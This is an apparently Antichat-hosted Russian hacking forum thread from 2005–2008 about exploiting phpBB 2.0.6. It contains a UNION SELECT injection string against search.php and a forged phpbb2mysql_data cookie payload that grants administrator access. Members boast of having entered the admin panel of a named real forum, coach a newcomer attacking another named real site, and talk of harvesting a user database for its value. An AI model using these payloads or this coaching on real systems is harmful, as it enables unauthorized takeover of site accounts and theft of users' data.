Форумы SQL-injection в PhpBB 2.0.6

Discussion in 'Уязвимости CMS/форумов' started by SQL_error, 18 May 2005.

  1. SQL_error

    SQL_error New Member

    Joined:
    17 May 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Посмотрел видео KEZ'а про SQL-injection в форуме PhpBB 2.0.6 - ошибка синтаксиса в модуле search.php (search.php?search_id=1'). Нашел форумы на этом движке, вставляю строку search.php?search_id=1' - выходит ошибка. Далее подставляю id=1 UNION SELECT concat(char(97,58,55,58,123........59,125)) FROM phpbb_users WHERE user_id=2/*, но вместо результатов поиска наблюдаю на странице следующее:
    Could not obtain search results
    DEBUG MODE
    SQL Error : -1 ERROR: syntax error at or near "," at character 104
    SELECT search_array FROM phpbb_search_results WHERE search_id = 1 UNION SELECT concat(char(97,58,55,58,123,115,58,49,52........110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125)) FROM phpbb_users WHERE user_id=2/* AND session_id = '53a7f9e3d98b3a1c3ca90e2cd6c8ee6b'
    Line : 693
    File : /home1/home/sa/www/public_html/phpBB2/search.php
    Т.е наблюдаю ту же ошибку вместе с введенной мною строкой :( И так в нескольких форумах. Подскажите пожалуйста из-за чего это может происходить, может я делаю чего не правильно....
    P.S. Я понимаю что видео на античате не является призывом к действию, и не все может получится, что там показывают, но все же очень прошу помочь в моем вопросе новичку, я это использую только для самообразования...
     
  2. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    мда.
    не проще ли пользоваца сплойтом, с которым можно сразу стать админом?
     
  3. SQL_error

    SQL_error New Member

    Joined:
    17 May 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    А как он называется и где его мона взять ???
     
  4. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    возможно причина в том что было удалено самое превое сообщение.
     
  5. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    1 person likes this.
  6. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    логинишься в опере\мозиле.
    удаляешь phpbb2mysql_sid
    меняешь phpbb2mysql_data на

    a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

    жмешь обновить.. и все.
     
  7. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    Гы кстати еще полно форумов где катят админские кукисы, особенно буржуйских,
    ща по адмнке лазила тут http://www.kona.dk/phpBB2/ :)))) кономейстер гы:)
     
  8. SQL_error

    SQL_error New Member

    Joined:
    17 May 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
  9. OLIVER

    OLIVER Elder - Старейшина

    Joined:
    5 Feb 2005
    Messages:
    54
    Likes Received:
    2
    Reputations:
    4
    Блин, Green_Bearт ебе описал самый простой способ и надёжный способ )
     
  10. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    Ссылка рабочая, а если запусткать не умеешь так и скажи:)))
    Скампилированный был где-то не помню ссылки...
    Как тебе уже и советовали тут, не парься а лучше юзай фокус с кукисами:)))
     
  11. SQL_error

    SQL_error New Member

    Joined:
    17 May 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Да точно самый простой способ...:) :) :)
    Спасибо всем, а особенно To Green_bear и Grrl !!!
    Давно хотел попробовать и научиться методу подмены кукисов, и вот получилось... :)
     
  12. mys-ber

    mys-ber New Member

    Joined:
    16 Feb 2008
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Товарищи, сделал всё как в видео на сайте
    http://forum.bcs.ru/index.php
    ошибку выдаёт

    а дальше не совсем понимаю что делать... объясните пожалуйста. Оч нужно...
     
  13. am@tory

    am@tory Elder - Старейшина

    Joined:
    8 Jan 2007
    Messages:
    65
    Likes Received:
    16
    Reputations:
    5
    1 Удаляеешь все сплойты и видео с компа.
    2 Читаем статьи про sql injection
    http://forum.antichat.ru/threadnav43966-1-10.html
    3 подбираем колонки в ручную, подставляя null, пока не пропадет ошибка.
    4 смотришь INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS
    http://starcat.dp.ua/doc/mysql-5.1/information-schema.html#schemata-table
    5 если не помогло, хотя должно пробуй highlight
     
    #13 am@tory, 6 Jul 2008
    Last edited: 6 Jul 2008
    1 person likes this.
  14. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    am@tory,

    3. омг. order by и group by в помощь, и можно и циферки подставлять. Почитай статьи и маны по sql.

    4. эти таблицы только в 5 ветке mysql

    =\
     
  15. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    1. там mssql => легче подзапросы... имхо.. ;)
    2.
    колонку с паролями не помню... сам ищи... ;)

    p.s:
    Не думал что на таком сайте, может такое старье стоять...
    Хорошую(дорогую) базу собрать можно...

     
    #15 aka PSIH, 6 Jul 2008
    Last edited: 6 Jul 2008
  16. am@tory

    am@tory Elder - Старейшина

    Joined:
    8 Jan 2007
    Messages:
    65
    Likes Received:
    16
    Reputations:
    5
    3 ofmg. order by у меня на 2.0.6 не работал.
    уж поверь я эти статьи до дыр затер

    4 для этого можно написать version()

    :cool:
     
    #16 am@tory, 6 Jul 2008
    Last edited: 6 Jul 2008
    1 person likes this.